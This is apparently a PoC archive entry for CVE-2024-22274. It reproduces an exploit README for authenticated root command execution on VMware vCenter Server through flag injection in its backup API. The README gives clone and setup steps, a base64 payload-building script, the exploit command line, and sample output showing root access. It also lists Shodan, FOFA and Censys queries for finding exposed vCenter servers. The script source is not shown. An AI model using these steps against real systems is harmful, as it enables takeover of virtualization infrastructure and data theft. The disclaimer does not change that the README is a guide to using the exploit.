POC详情: 8f51cb1edd104f5fbeb3fa9af1d2422fc4d9bde5

标题: VMware vCenter Server 安全漏洞 (CVE-2024-22274)
描述:VMware vCenter Server是美国威睿(VMware)公司的一套服务器和虚拟化管理软件。该软件提供了一个用于管理VMware vSphere环境的集中式平台,可自动实施和交付虚拟基础架构。 VMware vCenter Server存在安全漏洞,该漏洞源于存在经过身份验证的远程代码执行漏洞,攻击者可能会利用此漏洞在底层操作系统上运行任意命令。
PoC -  Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit))
<h1 align="center">
    Privilege Escalation: VMware vCenter Server Authenticated RCE

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## 📜 Description 

The “com.vmware.appliance.recovery.backup.job.create” and the
“com.vmware.appliance.recovery.backup.validate” API components are vulnerable to a flag
injection attack that can be leveraged to execute arbitrary commands as the root user on
the target system."

## 📚 Table of Contents
- 📜 [Description](#-description)
- 🛠️ [Installation](#-installation)
- ⚙️ [Usage](#-usage)
- 🔎 [Discovery](#-discovery)
- 📝 [Notes](#notes)
- 💁 [References](#-references)
- 📢 [Disclaimer](#disclaimer)
## 🛠️ Installation and Configuration 
> [!NOTE]
> To work with this PoC exploit, you must have valid credentials and log in to the VMware vCenter Server shell via SSH. The user must have the "admin" role, as specified in the `vcenter_creds.txt` file.
$ git clone https://github.com/l0n3m4n/CVE-2024-22274-RCE.git
$ cd CVE-2024-22274-RCE 
$ python3 -m venv venv && source venv/bin/activate
$ pip install -r requirements.txt 
> Run or modify `user2base64.sh` to  encode the newuser added into base64 and it automatically create `payload.txt`

$ bash user2base64.sh
Payload has been encoded to base64, saved payload.txt                                 

## ⚙️ Usage

### Vulnerable Version
### Successful Execution and Exploitation
$ python3 CVE-2024-22274-RCE.py -t -P 22 -p payload.txt -c vCenter_creds.txt
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[+] Connected to via SSH
[+] Payload executed successfully. Output: 
   uid=0(root) gid=0(root) groups=0(root)

[+] Exploitation successful: You have root access.
[+] Finished executing commands on

### Successful Execution but No Root Access
> This example means your getting connected but the payload not correctly configured or loaded. [Refer to PDF PoC](/assets/VMware-vCenter.pdf) for more detailed infomation.
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[+] Connected to via SSH
[+] Payload executed successfully. Output: 
   No privileges escalation detected.

[+] Exploitation failed: Root access not obtained.
[+] Finished executing commands on
### Missing Username or Password in Configuration File
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[-] Error: Username or password not found in configuration file.
### Connection Failure or SSH Error
> Please check the host address and credentials.
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[-] Error: [SSH Error] Connection to failed.
## 🔎 Discovery 
- **CENSYS**: `"VMware vCenter"`, **Filter**: `services.port: 443 AND tags: "VMware"`
- **FOFA**: `title="VMware vCenter"`, **Filter**: `port="443" && title="VMware vCenter"`
- **SHODAN**: `"VMware vCenter"`, **Filter**: `port:443 "VMware vCenter"`

## 📝 Notes
This exploit PoC won’t be effective if you don’t understand how to interpret the script, as it has been intentionally altered to prevent "script kiddies"  from simply copying and running it without comprehension. VMware vCenter Server is a critical component in managing virtualized environments, if someone access to it they can gain a full control over the virtual infrastructure and exfiltrate sensitive data. this PoC is designed for those already have small technical expertise to use it correctly, so if you’re script kiddies aiming to cause disruption without understanding the implications this exploit won’t be useful for you.

## 💁 References
- http://www.vmware.com/security/advisories
- https://nvd.nist.gov/vuln/detail/CVE-2024-22274
- https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202405-4049
- https://bdu.fstec.ru/vul/2024-05108
- https://github.com/advisories/GHSA-xm44-79f8-q8r7
## 📢 Disclaimer
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool. [create issue](https://github.com/l0n3m4n/CVE-2024-22274-RCE/issues)


[4.0K] /data/pocs/8f51cb1edd104f5fbeb3fa9af1d2422fc4d9bde5 ├── [4.0K] assets │   ├── [1.1M] VMware-vCenter.pdf │   ├── [ 62K] VMware-vCenter.png │   └── [ 78K] vulnerable-version.png ├── [3.8K] CVE-2024-22274-RCE.py ├── [ 2] payload.txt ├── [7.2K] README.md ├── [ 30] requirements.txt ├── [ 359] user2base64.sh └── [ 58] vcenter_creds.txt 1 directory, 9 files
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